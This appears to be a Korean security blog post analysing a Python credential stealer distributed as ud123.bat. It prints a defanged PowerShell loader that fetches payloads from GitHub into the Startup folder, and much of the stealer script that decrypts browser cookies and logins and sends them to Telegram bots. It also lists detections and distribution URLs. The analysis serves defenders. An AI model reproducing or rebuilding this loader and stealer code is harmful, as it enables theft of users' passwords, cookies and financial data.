Python(파이썬)으로 만들어진 스틸러(Stealer)-ud123.bat(2024.7.15)

오늘은 Python(파이썬)으로 만들어진 스틸러(Stealer)인 ud123.bat에 대해 글을 적어 보겠습니다.
파이썬은 1991년에 귀도 반 로섬(Guido van Rossum)에 의해 만들어진 인터프리터 프로그래밍 언어이며 현재는 교육용 프로그래밍 언어로 각광 받고 있습니다.
일단 해당 악성코드는 스틸러(Stealer) 즉 뺏는 것입니다. 브라우저 접근기록부터 신용카드, 암호화폐 지갑 정보 등의 개인정보 및 신용정보 등을 탈취 정보 유출형 악성코드입니다. 뭐 HEX로 보면 이상한 글자들만 반복만 될 것인데 쭉 내려가면 다음과 같은 결과를 얻을 수가 있습니다.
CyberChef 로 보면 다음과 같은 결과를 확인할 수가 있습니다.

MD5:f796cce1fb77fe1a71c8b248ced9fac4

CyberChef 로 요리 한 결과

C:\WINDOWS\System32\WindowsPowerShel(l)\v1.0\powershell.exe -windowstyle
hidden Invoke-WebRequest -URI hxxps://github(.)com/T1-1111/2222/raw/main/ud123(.)bat -OutFi
le "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start
Menu'\\Programs\\Startup\\WindowsSecure123(.)bat";
C:\WINDOWS\System32\WindowsPowerS(h)ell\v1.0\powershell.exe -windowstyle
hidden Invoke-WebRequest -URI hxxps://github(.)com/T1-1111/2222/raw/main/ud(.)bat -OutFile
"C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Me
nu'\\Programs\\Startup\\WindowsSecure.bat";
powershell.exe -WindowStyle Hi(d)den -Command "[Net.ServicePointManager]
::SecurityProtocol = [Net.SecurityProtocolType](:):Tls12; (New-Object -Typ
eName System.Net.WebClient).DownloadFile('hxxps://github(.)com/T1-1111/222
/raw/main/Document(.)zip', 'C:\Users\Public\Document(.)zip')";cmd /c powers
hell(.)exe -WindowStyle Hidden -Command Expand-Archive -Path "C:\Users\Publ
ic\Document.zip" -DestinationPath "C:/Users/Public/Document";powershell(.)e
xe -WindowStyle Hidden -Command  "C:\Users\Public\Document\python
C:\Users\Public\Document\Lib\sim().py"

코드 설명

먼저 GitHub 에서 ud123(.)bat 파일을 다운로드 하여 사용자의 시작 프로그램 폴더에 저장 이렇게 하면 사용자 컴퓨터가 시작될 때마다 악성코드 파일이 실행되도록 하게 하는 것입니다.
명령은 유사하게 GitHub에서 ud(.)bat 파일을 다운로드 하여 시작 프로그램 폴더에 저장
추가 명령:
다음 명령을 통해서 Document(.)zip 파일을 다운로드
cmd /c powershell(.)exe -WindowStyle Hidden -Command Expand-Archive -Path "C:\Users\Public\Document(.)zip" -DestinationPa(t)h "C:/Users/Public/Document";
다운로드 된 ZIP 파일을 ublic/Document 폴더에 압축 해제
powershell(.)exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim().py"
압축 해제된 폴더 내의 Python 스크립트를 실행하게 돼 있습니다. 해당 악성코드를 Document(.)zip를 다운로드 해서 압축을 풀고 sim().py 풀어보면 또 그냥 명령어 넣으면 되지 사람 귀찮게 맨 아랫부분부터 악성코드가 준비돼 있습니다.

ud123.bat 업로드 사이트

sim(.)py 내용

sim.py 내용

sim.py 내용

import os,json,shutil,win32(c)rypt,hmac,sqlite(3),b(a)se64,random,req(u)ests,threading,time,platform
from C(r)ypto.Cipher import DES3,AES
from pyas(n)1.codec.der import decoder
from hashlib i(m)port sha1, pbkdf2_hmac
from Crypto.Util.(P0adding import unpad 
from base(6)4 import b64decode
from d(a)tetime import (d0atetime
def demso() :
    if os.path(.)exists(os.path.join(os.)env(i)ron["US(E0RPROFILE"], "App(D)ata", "Lo(c)al",
    "number(.)txt")):
        with o(p)en(os.path(.)join(os.environ["USER(P)ROFILE"], "A(p)pData", "(L)ocal","nu
        mber(.)txt"), 'r') as file1:
            num(b)er = file1.read()
        number = in(t)(n(u)mber)+1
        with open(os.path.j(o)in(os.(e)nviron["USER(P)ROFILE"], "Ap(p)Data", "(L)ocal","nu(m)ber.txt")
        , 'w') as f(i)le2:
            file2.write(str(number))
    else:
        with open os.path.(j)oin(os.environ["USRPROFILE"], "AppDaa", "Lo(c)al","num(b)er.txt")
        , 'w') as fil(e)3:
            file3.write("1")
            number = 1
    return num(b)er
def id():
    if os.path.ex(i)sts(os.path.join(os.e(n)viron["US(E)RPROFILE"], "AppDa(t)a", "Lo(c)al","id.t
    t")):
        with open(os.path(.)join(os.environ["USERPR(O)FILE"], "App(D)ata", "Lo(c)al","id(.)txt"
        ), 'r') as file1:
            id = file1(.)read()
    else:
        random_number = ran(d)om.randint(10**14, 10**15 - 1)
        id = str(random_nu(m)ber)
        with open(os.path.joi(n)(os.environ["USERPROFILE"], "AppData", "Local","id.txt"), 'w
        ') as file2:
            file2.write(id)
    return id


hostname = os(.)getenv("COMPUTERNAME")
usernamex = os(.)getlogin()
windows_version = platform.platform()
now = datetime(.)now()
response =request(s).get("hxxps://ipinfo(.)io").text
ip_country = json.loa(d)s(response)
ten_country = ip_country['region']
city = ip_country['city']
ip = ip_country['ip']
country_code = ip_country['country']
newtime = str(now.hour) + "h" +str(now.minute)+"m"+str(now.second)+"s"+"-"+str(no
w.day)+"-"+str(now.month)+"-"+str(now.year)
name_file = country_code +" "+ ip +" "+newtime
    


def find_profile(path_userdata):
    profile_path = []
    for name in os.listdir(path_userdata):
        if name.startswith("Profile") or name == 'Default':
            dir_path = os.path.join(path_userdata, name)
            profile_path.append(dir_path)
    return profile_path

def get_chrome(data_path,chrome_path):
    profiles = find_profile(chrome_path)
    def copy_file(l):
        profile = profiles[l]
        data_chrome = os.path.join(data_path, f"Chrome {l}");os.mkdir(data_chrome)
        try:
            
            if os.path.exists(os.path.join(profile,'Network','Cookies')):
                shutil.copyfile(os.path.join(profile,'Network','Cookies'),os.path.j
                oin(data_chrome,'Cookies')) 
            if os.path.exists(os.pat(h).join(profile,'Login Data')):
                shutil.copyfile(o(s).path.join(profile,'Login Data'),os.path.joi
                n(data_chrome,'Login Data'))
            if os.path.exists((o)s.path.join(chrome_path,'Local State')):
                shutil.copyfile(os.path(.)join(chrome_path,'Local State'),os.path
                .join(data_chrome,'Local State'))  
        except:print('copy chrome l?i')
        encrypt(data_chrome)
    threads = []
    for l in range(len(profiles)):
        threads+= [threading.Thread(target=copy_file,args={l},)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
def get_edge(data_path,edge_path):
    profiles = find_profile(edge_path)
    def copy_file(l):
        profile = profiles[l]
        data_edge = os.path.join(data_path, f"Edge {l}");os.mkdir(data_edge)
        try:
            os.system('taskkill /f /im msedge(.)exe')
            if os.path.exists(os.path.join(profile,'Network','Cookies')):
                shutil.copyfile(os.path.join(profile,'Network','Cookies'),os.path.join(data_edge,'Cookies')) 
           ......
    if clearText == b'passw(o)rd-check\x02\x02': 
      c.execute("SELECT a11,a1(0)2 FROM nssPrivate;")
      for row in c:
        if row[0] != None:
            break
      a11 = row[0]
      a102 = row[1] 
      if a102 != None: 
        decoded_a11 = decode(r.)decode( a11 )
        clearText= decryptPBE( d(e)coded_a11, globalSalt )
        return clea(r)Text[:24]   
    return None
.....
        t.start()
    for t in threads:
        t.join()
    z_ph = os.path.join(os(.0environ["TEMP"], name_file +'.zip');shutil.make_archive(z_
    ph[:-4], 'zip', data_path)
    with open(z_ph, 'rb') as f:
        
        requests.post(u1,data={'caption': "\n"+"country :  " + city + "-"+ten_country
        +"-"+country_code +"\(n)" +"id :  " + id() +"\n"+ windows_version +"\nip: "+ip 
        +"\nUsername :"+hostname(+0"/"+usernamex+ "\n"+ number,'chat_id': id1},files={
        'document': f})

    with open(z_ph, 'rb') as f1:
        
        requests.post(u2,data={'caption': "\n"(+)"country :  " (+) city + "-"+ten_country+"-"+country_code +"\n" +"id :  " + id() +"\n"+ windows_version +"\nip: "+ip +"\nUsername :"+hostname+"/"+usernamex+ "\n"+ number,'chat_id': id2},files={'document': f1})
    
mai(n)()

코드 설명

Python 코드 스니펫은 여러 브라우저의 사용자 데이터를 탈취하는 스틸러(Stealer) 해당 코드는 크롬, 파이어폭스, 마이크로소프트 엣지,오페라,브레이브,크로미움 브라우저에서 쿠키와 로그인 데이터를 수집 한 다음 이를 텔레그램으로 전송
라이브러리 임포트:
os, json, shutil, requests 등 다양한 라이브러리를 사용하여 파일 조작, 데이터 전송 등을 수행
암호화와 해독을 위해 win32crypt, Crypto, pyasn1, hashlib 등을 사용
환경 설정 및 사용자 정보 수집:
os.getenv, os.getlogin, platform.platform 등을 사용하여 시스템 정보와 사용자 정보를 수집
requests.get("hxxps://ipinfo(.)io").text를 통해 외부 IP 정보를 가져오기 이거는 마이크로소프트 고객센터 사칭 피싱 사이트 등에 자주 보이는 것
브라우저 프로필 찾기:
ind_profile 함수는 주어진 경로에서 브라우저 프로필을 찾음
구글 크롬, 마이크로소프트 엣지,브레이브,크로미움,오페라,파이어폭스의 프로필 경로를 각각 탐색
데이터 복사 및 암호화:
각 브라우저의 프로필 폴더에서 쿠키, 로그인 데이터,로컬 상태 파일을 복사
복사된 데이터를 AES, DES3 암호화 방식으로 해독하여 평문으로 변환
탈취한 데이터 전송:
requests.post를 사용하여 탈취한 데이터를 텔레그램으로 전송
두 개의 텔레그램 봇을 사용하여 데이터 유출을 시도
주요 함수
demso():파일 number.txt를 읽어 현재 실행 횟수를 증가
id():파일 id.txt를 읽어 사용자 고유 ID를 반환 없으면 새로 생성
get_chrome, get_edge, get_brave, get_chromium, get_opera: 각각 구글 크롬, 마이크로소프트 엣지,브레이브,크로미움,오페라 브라우저의 데이터를 복사
get_firefox:파이어폭스 브라우저의 데이터를 복사
encrypt:구글 크롬 및 구글 크롬을 기반으로 하는 크로미움 브라우저의 데이터를 암호화 해제하고 평문으로 변환
encrypt_firefox:파이어폭스 브라우저의 데이터를 암호화 해제하고 평문으로 변환
main(): 브라우저 데이터를 복사하고 이를 압축하고 텔레그램 봇을 통해 전송
코드는 사용자의 브라우저 데이터(쿠키, 로그인 데이터 등)를 수집하여 외부 서버로 전송하는 악성코드 이며 이렇게 하면 브라우저에 저장된 사이트 로그인 정보, 계좌번호등이 탈취되기 때문에 사용자는 금전적으로 손해를 입을 수가 있음
즉 기본적으로 브라우저에 비밀번호등을 저장하는 행위 그리고 기본적인 보안 수칙 그리고 굳이 나는 계정정보가 많아서 헷갈린다. 그러면 비트워든,RoboForm,1pass word 같은 서비스를 결제하고 사용을 하는 것을 굉장히 추천합니다.
2024-07-18 12:25:06 UTC 기준 바이러스토탈에 탐지하는 보안 업체들은 다음과 같습니다.
ALYac:Trojan.GenericKD.73504228
Antiy-AVL:Trojan/Script.Agent
Arcabit:Trojan.Generic.D46195E4
BitDefender:Trojan.GenericKD.73504228
Emsisoft:Trojan.GenericKD.73504228 (B)
eScan:Trojan.GenericKD.73504228
GData:Trojan.GenericKD.73504228
Ikarus:Trojan.Batch
MAX:Malware (ai Score=81):Trellix (HX)
Trojan.GenericKD.73504228
Varist:ABTrojan.JDQJ-
VIPRE:Trojan.GenericKD.73504228

악성코드 유포 사이트

hxxps://gitlab(.)com/1234080927/123
hxxps://github(.)com/T1-1111/

일단 개인적으로 사용하는 안티바이러스 프로그램인 시만텍(Symantec)제품은 신고 끝
항상 조심하시길 바랍니다. 개인적으로 노스 랜드(북한) 해킹 단체라고 가정한다면 이렇게 공격하는 방법 한국인들 개인정보 및 대북 관계자분들 개인정보 터는 것이 이 방법이 더 빠를 것 같습니다. 여러분의 브라우저에 상당히 좋은 정보들이 많으니까요?